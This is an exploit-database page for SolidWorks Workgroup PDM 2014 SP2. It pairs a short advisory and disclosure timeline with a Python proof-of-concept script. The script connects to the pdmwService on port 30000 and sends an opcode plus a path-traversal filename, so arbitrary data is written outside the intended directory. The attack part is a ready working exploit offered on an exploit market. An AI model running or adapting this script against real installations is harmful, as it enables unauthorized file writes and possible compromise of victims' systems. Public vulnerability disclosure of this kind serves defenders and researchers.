[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability

Author
Mohamed Shetta
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21935
Category
remote exploits
Date add
22-02-2014
Platform
windows
'''
# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability
# Date: 2-21-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
# Tested on: Windows 7
#Vulnerability type: Arbitrary File Write
#Vulnerable file: pdmwService.exe
#PORT: 30000
 
 
---------------------------------------------------------------------------------------------------------
Software Description:
 
SolidWorks
Workgroup PDM is a PDM tool that allows SolidWorks users operating in
teams of 10 members or less to work on designs concurrently. With
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD
data while maintaining an accurate design history.
 
 
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
 
This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.
 
------------------------------------------------------------------------------------------------------------
Disclosure timeline:
 
12/15/2013 - Vendor notified and no response.
2/21/2014 - Public disclosure
'''
 
#!/usr/bin/env python
   
import socket
import struct
import ctypes
 
FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test
Data="A"*1028
FileSize=len(Data)
FNsz=len(FileName)
OpCode="\xD0\x07\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
s.send(OpCode)
s.send(struct.pack("I", FNsz))
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)

#  0day.today [2024-12-24]  #